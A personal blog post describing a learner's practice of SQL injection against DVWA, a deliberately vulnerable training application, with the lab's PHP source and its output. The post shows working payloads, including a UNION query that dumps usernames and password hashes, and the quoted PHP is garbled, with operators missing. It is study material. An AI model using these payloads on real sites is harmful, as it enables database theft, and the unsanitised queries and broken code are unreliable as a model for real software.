SQL injection

This time I will tell you a little about sql injection I am studying. I learned to direct practice in DVWA (Damn Vulnerable Web Applicaion). I started from a low level, and here are the php syntax that must be injected :
"
<?php     if(isset($_GET['Submit'])){
    // Retrieve data
    $id $_GET['id'];
    $getid "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
    $num mysql_numrows($result);
    $i 0;
    while ($i $num) {
        $first mysql_result($result,$i,"first_name");
        $last mysql_result($result,$i,"last_name");
        echo '<pre>';
        echo 'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
        echo '</pre>';
        $i++;
    }
} ?>
"
at this level no matter what we enter is filtered by the program so that we can enter a query that can cause programs to display all the contents of the database for exemple we can we can insert :
1' or '1'='1
so the sql query to be :
 SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1
The following results: 
ID: 1' or '1' ='1
   First name: admin
   Surname: admin
ID: 1' or '1' ='1
   First name: Gordon
   Surname: Brown
ID: 1' or '1' ='1
   First name: Hack
   Surname: Me
ID: 1' or '1' ='1
   First name: Pablo
   Surname: Picasso
ID: 1' or '1' ='1
   First name: Bob
   Surname: Smith
this will cause the condition to be true so and cause the application displays all the contents of the database. Low levels has been solved here, now we enter to the medium level and here's a php syntax that we must penetrate to inject the database :
"
<?php if (isset($_GET['Submit'])) {
    // Retrieve data
    $id $_GET['id'];
    $id mysql_real_escape_string($id);
    $getid "SELECT first_name, last_name FROM users WHERE user_id = $id";
    $result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
    $num mysql_numrows($result);
    $i=0;
    while ($i $num) {
        $first mysql_result($result,$i,"first_name");
        $last mysql_result($result,$i,"last_name");
        echo '<pre>';
        echo 'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
        echo '</pre>';
        $i++;
    }
} ?>
"
at this level there is little filters that cause we can not enter the quotes, but it is not a problem because we do not need it anymore for this syntax. We get through by entering the following syntax
1 or 1=1
so the sql query to be :
 SELECT first_name, last_name FROM users WHERE user_id = 1 or 1=1
ID: 1 or 1=1
   First name: admin
   Surname: admin
ID: 1 or 1=1
   First name: Gordon
   Surname: Brown
ID: 1 or 1=1
   First name: Hack
   Surname: Me
ID: 1 or 1=1
   First name: Pablo
   Surname: Picasso
ID: 1 or 1=1
   First name: Bob
   Surname: Smith
 or by this way :
SELECT first_name, last_name FROM users WHERE user_id = 1 union all select eser,password from users--

ID: 1 union all select user,password from users--
First name: admin
Surname: adminID: 1 union all select user,password from users--
First name: admin
Surname: 900150983cd24fb0d6963f7d28e17f72ID: 1 union all select user,password from users--
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03ID: 1 union all select user,password from users--
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216bID: 1 union all select user,password from users--
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7ID: 1 union all select user,password from users--
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99



at the medium level is not much different from the low level. after graduating from the low and medium level is now high time to enter the territory level, and php source code follows
"
<?php     if (isset($_GET['Submit'])) {
    // Retrieve data
    $id $_GET['id'];
    $id stripslashes($id);
    $id mysql_real_escape_string($id);
    if (is_numeric($id)){
        $getid "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result mysql_query($getid) or die('<pre>' mysql_error() . '</pre>' );
        $num mysql_numrows($result);
        $i=0;
        while ($i $num) {
            $first mysql_result($result,$i,"first_name");
            $last mysql_result($result,$i,"last_name");
            echo '<pre>';
            echo 'ID: ' $id '<br>First name: ' $first '<br>Surname: ' $last;
            echo '</pre>';
            $i++;
        }
    }
} ?>
"
for this high level I have not been able to solve real, but if in a dream I've had 3 times the dream of getting a way to inject the source code.
 

Comments

Post a Comment

Popular posts from this blog

Grabbing Proxy With Selenium and Python

Image
Selenium is automated browser that can be controlled by script. Selenium support for many programming language like Java, csharp, python, ruby, php, perl, and javascript. This simple script for grabbing proxy list from freeproxylist.net website created with python. 1. Install python selenium        # apt-get install python-pip        # pip install selenium 2. Download browser driver     Chrome : https://sites.google.com/a/chromium.org/chromedriver/downloads Edge : https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/ Firefox : https://github.com/mozilla/geckodriver/releases Safari : https://webkit.org/blog/6900/webdriver-support-in-safari-10/ Chose favorite browser you want. 3.  Run this script import os from selenium import webdriver from bs4 import BeautifulSoup from selenium.webdriver.common.keys import Keys chromedriver = "./chromedriver" # replace with your browser driver os.environ["webdriver.chrome.driver"] = chromed
Read more

Authorization Testing

Image
1. Testing for Path Traversal First, we test if it is possible to find a way to execute a path traversal attack and access reserved information About input vector: 2. Testing for bypassing authorization schema This kind of test focuses on verifying how the authorization schema has been implemented for each role/privilege to get access to reserved functions/resources. 3. Testing for Privilege Escalation During this phase, the tester should verify that it is not possible for a user to modify his or her privileges/roles inside the application in ways that could allow privilege escalation attacks.
Read more

Bypass HTML Field Restrictions

This time I learn about Bypass HTML Field Restrictions. I bypass the html form . In order to pass this lesson , I must submit the form with each field containing the value of unallowed . I have to submit an invalid value for all six fields in one delivery form provided . that is : select field which has two choices , radio button which has two choices , input field which retricted to 5 character, and disableinput field with a form that can not be filled . And this some way that I have tried to bypass it : First I submibt that form as usual and I did not find any change Then I tried to intercept request by webscarab, I change values that not provided there. but I not find any changes too. I studied again after it there are only 5 fields in the request when the procedure mentioned there are 6 fields . then I add a new field that is itself disableinput field , the parameter I get from the source web page . but I not find
Read more